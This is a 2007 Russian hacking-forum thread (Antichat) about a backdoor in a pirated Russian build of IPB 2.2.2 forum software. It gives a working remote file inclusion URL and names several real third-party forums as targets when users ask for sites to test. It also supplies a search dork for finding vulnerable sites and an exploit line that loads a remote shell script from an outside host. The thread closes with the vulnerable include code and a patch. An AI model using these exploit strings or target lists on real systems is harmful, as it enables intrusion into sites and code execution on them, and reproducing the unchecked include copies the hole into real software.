Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Бэкдор в Ipb 2.2.2 (Русская пиратская версия) (https://forum.antichat.xyz/showthread.php?t=44421)

Shram-spb 14.07.2007 05:06

Бэкдор в Ipb 2.2.2 (Русская пиратская версия)
 
Сегодня изучал свой форум на предмет пхп иньекций и наткнулся на бэкдор.. погуглил немного и нашел в сети еше штук 30 таких форумов..
Как я понял его просто кто-то всунул туда и стал распространять...
В общем работает тока на IPB 2.2.2 Русская версия (и то не на всех)
Код:

http://site/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]
Как вам, а? :)

Isis 14.07.2007 05:13

Работает не везде...
Просто надо качать нуллы от русского офф.сайта поддержки Ipb

Zitt 14.07.2007 13:41

Не тока в левых Ipb такое есть...

Vallez 15.07.2007 01:10

Shram-spb напиши плз форум где работает для теста.

Shram-spb 15.07.2007 01:33

Код:

http://vsecrazy.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[url]

Vallez 15.07.2007 13:22

Не работает сайт можно ешё 1 плз.

Shram-spb 15.07.2007 15:16

Цитата:

Сообщение от Vallez
Не работает сайт можно ешё 1 плз.

Видимо уже кто-то сломал.. или админы проснулись %)

Вот еще парочка.
Код:

http://antigothic.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]
Код:

http://www.forum.partisans.com.ua/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]

a1ex 16.07.2007 17:45

Поподробней распиши, обьясни поподробней, ато я чёт не пойму на каких работает и как глянуть что работает.

GrAmOzEkA 16.07.2007 18:07

Написано же
Цитата:

[url ]
вот и подставляй туда свой урл

Вот пример:

Код:

http://antigothic.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=http://forum.antichat.ru/showthread.php

Shram-spb 16.07.2007 18:07

Цитата:

Сообщение от a1ex
Поподробней распиши, обьясни поподробней, ато я чёт не пойму на каких работает и как глянуть что работает.

Код:

dork: "Русская версия IP.Board 2.2.2 © 2007  IPS, Inc."

exploit: http://site/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=http://4elovek.spb.ru/shell.txt

Куда уж подробнее??
Работает на чьем-то конкретном null'e.. но на чьем я пока не выяснил..
Ясно, что версия пиратская.. если на главной странице внизу написано, что "Лицензия для...", то адназначно не прокатит..
Ищите.. я много таких нашел.. но ломать не советую.. ничего инетерсного там нет, посещаемость таких форумов как правило мала... так что лучше проверять дырку и сообщать админам... фиксится так:

/source/action_public/profile.php
строка 885:

Код:

if ( $chk )
{
        @include ($chk);
        exit();
}

Меняем на:

Код:

if ( $chk )
{
  echo "Fuck you, Spilberg... Fixed by 5hr4M...";
  exit();
}



Время: 01:17